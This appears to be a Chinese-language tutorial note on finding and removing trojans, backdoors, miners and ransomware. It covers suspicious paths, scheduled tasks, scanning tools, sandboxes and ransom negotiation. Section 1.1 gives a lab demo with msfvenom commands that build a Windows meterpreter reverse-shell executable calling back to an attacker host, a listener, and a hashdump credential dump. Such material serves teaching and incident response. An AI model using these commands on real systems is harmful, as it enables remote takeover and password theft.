系统木马后门排查
一、常见的病毒分类
1.1、远控木马
远程控制木马被红队广泛使用,一般是用metasploit、cobaltstrike等控制器生成的系统可执行文件,如exe,elf,apk,macho文件。一般通过两种方式传播
- 文件上传漏洞+ 命令执行(主动)
- 文件下载钓鱼+诱导执行(钓鱼)
系统执行木马文件后,会反连至黑客服务器,黑客即可控制受害者计算机或移动设备,如开启摄像头、屏幕截图、文件管理、软件安装等操作。
用kali中自带的C2软件metasploit生成远控木马文件,并让windows server 2016虚拟机执行远控木马文件
在kali中操作
1. 生成exe后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=这里替换成kali的eth0网卡IP地址 lport=9999 -f exe -o test.exe
2. 开启监听
msfconsole handler -p windows/x64/meterpreter/reverse_tcp -H 这里替换成kali的eth0网卡IP地址 -P 9999
在kali中开启web服务,在window server中直接进行下载
在kali中开启web服务 |
然后直接运行test.exe,在kali监听页面进行命令执
- Kali(msf6 > 与 meterpreter >)中运行
获取密码 hashdump |
windows中的密码是可以破解的
1.2、勒索病毒
勒索病毒是一种极具传播性、破坏性的恶意软件,主要利用多种密码算法加密用户数据,恐吓、胁迫、勒索用户高额赎金。近期,勒索病毒攻击形势更加严峻,已经对全球能源、金融等领域重要企业造成严重影响。由于勒索病毒加密 信息难以恢复、攻击来源难以追踪,攻击直接影响与生产生活相关信息系统的正常运转,勒索病毒对现实世界威胁加剧,已成为全球广泛关注的网络安全难题。 - 中国信通院《勒索病毒安全防护手册》
1.3、挖矿病毒
- 虚拟货币“挖矿”是指依据特定算法,通过运算去获得虚拟的加密数字货币,常见的有比特币、以太坊币、门罗币、EOS币等。由于虚拟货币“挖矿”需要借助计算机高速运算,消耗大量资源,一些不法分子通过植入挖矿木马,控制受害者计算机进行虚拟货币“挖矿”。
- “挖矿”木马被植入主机后,利用主机的运算力进行挖矿,主要体现在CPU、GPU使用率高达90%以上,有大量对外进行网络连接的日志记录
- 常见挖矿木马
1.4、红队遗留软件
红队在攻击受害者时,需要上传一些必备的工具到受害者计算机,或在黑客服务器开启监听开放下载端口传输红队工具
二、排查病毒
2.1、相关路径排查
C:\Windows\Temp |
2.1、修改时间排查
3、可疑计划任何排查
taskschd.msc |
4、可疑进程排查
三、查杀病毒
3.1、杀毒软件
360、火绒、卡巴斯基、小红伞。。。。。
3.2、在线病毒检测
功能强大,会把扫描的病毒同步到所有的威胁情报分析,如果那自己服务器IP当作反弹shell,服务器IP会被标记
腾讯的哈勃
3.3、在线沙箱
在线病毒和在线沙箱的区别
- 在线病毒平台不会运行去运行病毒,只是对文件进行静态分析
- 在线沙箱平台相当于在虚拟机中运行所上传的文件,在运行中进行分析。
四、勒索病毒处置方案
一般都是找个专业公司,让中介公司与黑客谈话,老实交赎金
4.1、判断病毒
4.1.1、病毒留下的勒索信息
- 加密勒索病毒
- MBR引导勒索病毒
- web服务器勒索病毒
- 安卓勒索病毒
4.1.2、被加密的文件
4.1.3、桌面背景
4.2、解密工具
- 深信服
- 解码刑警
4.3、解密问题
勒索病毒在真假方面可以分为两类,一类为真实加密一类为虚假加密
采用真实加密的勒索病毒由于采用了高强度加密方式,没有病毒作者手中的密钥,就无法进行文件的解密操作,受害者不得不为此交付赎金,而有些则因为无法联系到病毒作者或者病毒加密文件时出错,进行导致了文件无法解密,用户资料文件被锁,损失惨重。一般勒索病毒的加密算法,不存在显著的技术漏洞。只能等待黑客的私钥被公开或泄露,或是有其他的技术性突破。
- 技术性突破
- 恶意软件编写者犯了一个执行上的错误,因此被加密的文件得以破解。例如Petya勒索软件和CryptXXX勒索软件。
- 恶意软件编写者(如TeslaCrypt案例)感到内疚,因此发布了密钥或主密钥。
- 执法机构搜获一台带有密钥的服务器并进行了分享,如CoinVault。
4.4、获取密钥
若认为确有必要寻求付费解密,可自行联系黑客付费购买密钥,或通过联系第三方购买相关服务。 第三方服务商所提供的解密方案为中介性质服务,代替用户与黑客取得联系并操作后续的付费、解密流程,本质上并不具备技术破解能力。
不建议直接向黑客付款。直接向黑客付款存在很大风险:
- 其一是可能拿到的解密工具并不能使用;
- 其二是可能存在密钥不对,无法解密您的文件;
- 其三是黑客可能会再次甚至多次向您索要赎金。
通过淘宝、搜索引擎或其它方式联系到的解密服务商,正式开展解密工作前一定要签订合同,明确解密不成功是否需要付款等问题,必要时可要求上门服务。
不要咨询过多第三方商家。因为第三方大多都是去找黑客购买密钥。过多的联系第三方商家,会造成黑客收到多次关于你设备的咨询,这可能导致黑客觉察到你对数据恢复有强烈需求,从而提高赎金。
4.5、清除病毒
- 格式化磁盘、重装系统、恢复系统等彻底破坏中招环境的其它操作。
- 彻底删除发现的可疑程序,病毒文件。如果发现可疑文件后,可以将文件打包为一 个加密压缩包后再进行删除或转移。
- 清除所有的勒索信息和被加密文件,这可能会影响后续文件的恢复。
- 恢复备份文件。